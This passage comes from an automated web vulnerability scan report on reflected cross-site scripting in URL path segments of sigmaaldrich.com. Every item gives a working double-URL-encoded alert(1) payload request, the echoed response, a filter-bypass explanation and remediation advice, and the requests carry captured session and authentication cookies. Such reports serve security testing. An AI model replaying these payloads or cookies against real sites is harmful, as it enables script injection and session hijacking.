bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:58 GMT
Content-Length: 28948
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/site-level13634";alert(1)//32b9ba8d555/corporate/investor-relations.html","E404") ;
   </script>
...[SNIP]...

1.629. http://www.sigmaaldrich.com/site-level/corporate/investor-relations.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /site-level/corporate/investor-relations.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1235%2522%253balert%25281%2529%252f%252f0b7e4887d8a was submitted in the REST URL parameter 2. This input was echoed as b1235";alert(1)//0b7e4887d8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /site-level/corporateb1235%2522%253balert%25281%2529%252f%252f0b7e4887d8a/investor-relations.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:59 GMT
Content-Length: 28948
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/site-level/corporateb1235";alert(1)//0b7e4887d8a/investor-relations.html","E404") ;
   </script>
...[SNIP]...

1.630. http://www.sigmaaldrich.com/site-level/corporate/investor-relations.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /site-level/corporate/investor-relations.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c6a3%2522%253balert%25281%2529%252f%252f7559b22080c was submitted in the REST URL parameter 3. This input was echoed as 3c6a3";alert(1)//7559b22080c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /site-level/corporate/3c6a3%2522%253balert%25281%2529%252f%252f7559b22080c HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:01 GMT
Content-Length: 28925
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/site-level/corporate/3c6a3";alert(1)//7559b22080c","E404") ;
   </script>
...[SNIP]...

1.631. http://www.sigmaaldrich.com/site-level/corporate/worldwide-offices.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /site-level/corporate/worldwide-offices.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e3b7%2522%253balert%25281%2529%252f%252ffa9c6485d2b was submitted in the REST URL parameter 1. This input was echoed as 6e3b7";alert(1)//fa9c6485d2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /site-level6e3b7%2522%253balert%25281%2529%252f%252ffa9c6485d2b/corporate/worldwide-offices.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:01 GMT
Content-Length: 28947
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/site-level6e3b7";alert(1)//fa9c6485d2b/corporate/worldwide-offices.html","E404") ;
   </script>
...[SNIP]...

1.632. http://www.sigmaaldrich.com/site-level/corporate/worldwide-offices.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /site-level/corporate/worldwide-offices.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a495e%2522%253balert%25281%2529%252f%252fbe03d49ade4 was submitted in the REST URL parameter 2. This input was echoed as a495e";alert(1)//be03d49ade4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /site-level/corporatea495e%2522%253balert%25281%2529%252f%252fbe03d49ade4/worldwide-offices.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:03 GMT
Content-Length: 28947
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/site-level/corporatea495e";alert(1)//be03d49ade4/worldwide-offices.html","E404") ;
   </script>
...[SNIP]...

1.633. http://www.sigmaaldrich.com/site-level/corporate/worldwide-offices.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /site-level/corporate/worldwide-offices.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1861e%2522%253balert%25281%2529%252f%252fa042e9096a8 was submitted in the REST URL parameter 3. This input was echoed as 1861e";alert(1)//a042e9096a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /site-level/corporate/1861e%2522%253balert%25281%2529%252f%252fa042e9096a8 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:05 GMT
Content-Length: 28925
Connection: close
